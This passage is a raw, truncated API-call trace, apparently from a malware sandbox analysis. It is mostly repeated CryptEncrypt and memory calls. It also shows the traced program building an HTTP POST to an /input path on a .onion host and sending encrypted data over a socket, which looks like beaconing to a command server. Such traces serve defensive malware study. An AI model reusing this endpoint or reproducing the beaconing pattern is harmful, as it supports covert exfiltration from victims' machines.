(_Size=0x1fd) returned 0x3691270 [0190.399] free (_Block=0x0) [0190.399] free (_Block=0x0) [0190.399] free (_Block=0x3d81e60) [0190.399] free (_Block=0x606108) [0190.399] malloc (_Size=0x1fd) returned 0x606108 [0190.399] free (_Block=0x0) [0190.399] malloc (_Size=0x1fd) returned 0x3d81e60 [0190.399] free (_Block=0x0) [0190.399] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.399] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.400] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e0c58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x60608c*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] malloc (_Size=0x1fd) returned 0x3691478 [0190.401] free (_Block=0x0) [0190.401] free (_Block=0x3691270) [0190.401] free (_Block=0x3d81e60) [0190.401] free (_Block=0x606108) [0190.401] malloc (_Size=0x1fd) returned 0x3691270 [0190.401] free (_Block=0x0) [0190.401] malloc (_Size=0x1fd) returned 0x606108 [0190.401] free (_Block=0x0) [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.401] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.402] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.403] CryptEncrypt (in: hKey=0x3e10d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10, dwBufLen=0x10 | out: pbData=0x3594f64*, pdwDataLen=0x316f3fc*=0x10) returned 1 [0190.403] malloc (_Size=0x1fd) returned 0x3d81e60 [0190.403] free (_Block=0x0) [0190.403] free (_Block=0x3691478) [0190.403] free (_Block=0x606108) [0190.403] free (_Block=0x3691270) [0190.403] malloc (_Size=0x202) returned 0x606108 [0190.403] free (_Block=0x0) [0190.403] EncryptMessage (in: phContext=0x3594d4c, fQOP=0x0, pMessage=0x316f434, MessageSeqNo=0x0 | out: pMessage=0x316f434) returned 0x0 [0190.403] send (s=0x5c8, buf=0x3de7008*, len=543, flags=0) returned 543 [0190.403] free (_Block=0x606108) [0190.403] free (_Block=0x3f653c0) [0190.403] free (_Block=0x3d81e60) [0190.403] GetTickCount () returned 0x11703ac [0190.403] malloc (_Size=0x10) returned 0x3648d70 [0190.403] free (_Block=0x0) [0190.403] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d70*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0190.403] free (_Block=0x3648d70) [0190.403] GetTickCount () returned 0x11703ac [0190.403] malloc (_Size=0x10) returned 0x3648e60 [0190.403] free (_Block=0x0) [0190.403] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e60*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0191.017] free (_Block=0x3648e60) [0191.018] GetTickCount () returned 0x117060d [0191.018] free (_Block=0x3f65460) [0191.018] free (_Block=0x3f65280) [0191.018] free (_Block=0x3648e78) [0191.018] free (_Block=0x3d9af08) [0191.018] free (_Block=0x3648e00) [0191.018] free (_Block=0x3f65320) [0191.018] free (_Block=0x3f654a0) [0191.018] _vscprintf (_Format="POST %s HTTP/1.1\r\nHost: %s\r\n", _ArgList=0x316f5b0) returned 52 [0191.018] malloc (_Size=0x35) returned 0x36247b0 [0191.018] free (_Block=0x0) [0191.018] vsprintf_s (in: _DstBuf=0x36247b0, _SizeInBytes=0x35, _Format="POST %s HTTP/1.1\r\nHost: %s\r\n", _ArgList=0x316f5b0 | out: _DstBuf="POST /input HTTP/1.1\r\nHost: regretzjibibtcgb.onion\r\n") returned 52 [0191.018] malloc (_Size=0x32) returned 0x36242f0 [0191.018] free (_Block=0x0) [0191.018] malloc (_Size=0x66) returned 0x60ae40 [0191.019] free (_Block=0x36247b0) [0191.019] free (_Block=0x36242f0) [0191.019] _vscprintf (_Format="Content-Length: %d\r\n\r\n", _ArgList=0x316f5b4) returned 23 [0191.019] malloc (_Size=0x18) returned 0x3f65300 [0191.019] free (_Block=0x0) [0191.019] vsprintf_s (in: _DstBuf=0x3f65300, _SizeInBytes=0x18, _Format="Content-Length: %d\r\n\r\n", _ArgList=0x316f5b4 | out: _DstBuf="Content-Length: 342\r\n\r\n") returned 23 [0191.019] malloc (_Size=0x99) returned 0x3f68c18 [0191.019] free (_Block=0x60ae40) [0191.019] free (_Block=0x3f65300) [0191.019] malloc (_Size=0x157) returned 0x606108 [0191.019] free (_Block=0x0) [0191.019] malloc (_Size=0x1d3) returned 0x3d81e60 [0191.019] free (_Block=0x3f68c18) [0191.019] free (_Block=0x606108) [0191.020] malloc (_Size=0x1d3) returned 0x606108 [0191.020] free (_Block=0x0) [0191.020] free (_Block=0x0) [0191.020] malloc (_Size=0x1fd) returned 0x3691270 [0191.020] free (_Block=0x0) [0191.020] CryptHashData (hHash=0x432d78, pbData=0x3691270, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0191.020] CryptDuplicateHash (in: hHash=0x432d78, pdwReserved=0x0, dwFlags=0x0, phHash=0x316f4cc | out: phHash=0x316f4cc) returned 1 [0191.020] malloc (_Size=0x14) returned 0x3f65280 [0191.020] free (_Block=0x0) [0191.020] CryptGetHashParam (in: hHash=0x432d38, dwParam=0x2, pbData=0x3f65280, pdwDataLen=0x316f464, dwFlags=0x0 | out: pbData=0x3f65280, pdwDataLen=0x316f464) returned 1 [0191.020] CryptDestroyHash (hHash=0x432d38) returned 1 [0191.020] free (_Block=0x3f65280) [0191.020] malloc (_Size=0x1fd) returned 0x3691478 [0191.020] free (_Block=0x0) [0191.020] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.020] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.021] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10, dwBufLen=0x10 | out: pbData=0x3f68b9c*, pdwDataLen=0x316f41c*=0x10) returned 1 [0191.022] CryptEncrypt (in: hKey=0x4327b8, 